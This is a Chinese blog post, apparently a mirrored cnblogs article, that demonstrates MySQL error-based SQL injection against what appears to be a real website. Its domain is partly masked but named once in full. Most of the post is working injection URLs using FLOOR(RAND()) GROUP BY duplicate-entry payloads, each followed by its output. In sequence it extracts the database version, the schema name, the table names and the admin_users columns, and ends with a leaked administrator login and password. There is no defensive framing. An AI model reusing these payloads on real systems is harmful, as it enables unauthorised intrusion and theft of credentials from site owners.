zoukankan      html  css  js  c++  java
  • MySQL基于报错注入2

    目标站点:

    0x1 注入点判断

    http://www.xxxxxx.com/pages/services.php?id=1 #true

    http://www.xxxxxx.com/pages/services.php?id=1' #false

    闭合单引号:

    http://www.xxxxxxcom/pages/services.php?id=1' --+ #true

    0x2 获取当前数据库基本信息

    数据库版本信息:

    http://www.xxxxxx.com/pages/services.php?id=1'  +OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 --+

    Duplicate entry '10.1.38-MariaDB-cll-lve:1' for key 'group_key'

    当前数据库:

    http://www.xxxxxx.com/pages/services.php?id=1'  +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) --+

    kuuku205_ohms

    0x3 获取对应库的表名

    http://www.xxxxxx.com/pages/services.php?id=1'  +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) --+

    admin_users

    bdetails

    booking

    calendar

    ga_admin_users

    ga_news

    ga_pages

    ga_products

    pages

    photogallery

    。。。。。太多了,这里只关注admin表

    0x4 获取admin_users标的字段

    http://www.xxxxxx.com/pages/services.php?id=1'  +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x61646d696e5f7573657273+AND+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) --+

    Duplicate entry 'userid~1' for key 'group_key'

    http://www.xxxxxx.com/pages/services.php?id=1'  +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x61646d696e5f7573657273+AND+table_schema=DATABASE()+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) --+

    Duplicate entry 'password~1' for key 'group_key'

    http://www.ohmsghana.com/pages/services.php?id=1'  +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x61646d696e5f7573657273+AND+table_schema=DATABASE()+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) --+

    Duplicate entry 'fname~1' for key 'group_key'

    http://www.xxxxxx.com/pages/services.php?id=1'  +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x61646d696e5f7573657273+AND+table_schema=DATABASE()+LIMIT+3,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) --+

    Duplicate entry 'lname~1' for key 'group_key'

    这里只获取:

    lname,password 即可

    0x5 获取数据库字段数据

    http://www.xxxxxx.com/pages/services.php?id=1'  +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(lname,0x7e,password)+AS+CHAR),0x7e))+FROM+admin_users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) --+

    Duplicate entry 'Staff~admin4ohms~1' for key 'group_key'

  • 相关阅读:
    怎样去阅读一份php源代码
    Cloudera Hadoop 4系列实战课程(电商业日志流量分析项目)
    ORACLE系列之SQL从入门到精通(全面把控数据库基础)
    jQuery2.0应用开发:SSH框架整合jQuery2.0实战OA办公自动化
    Unity3D游戏引擎实战开发从入门到精通
    中国移动:物联网项目实战开发企业级应用(ssp框架应用、EXTJS4.2、GoogleMap、JPA)
    基于OpenLayers实战地理信息系统(离线地图,通过基站转经纬度,Quartz深入,轨迹实战)
    Android自动化测试从入门到精通
    博客从新开张啦!
    python scrapy版 极客学院爬虫V2
  • 原文地址:https://www.cnblogs.com/hack404/p/10838641.html
Copyright © 2011-2022 走看看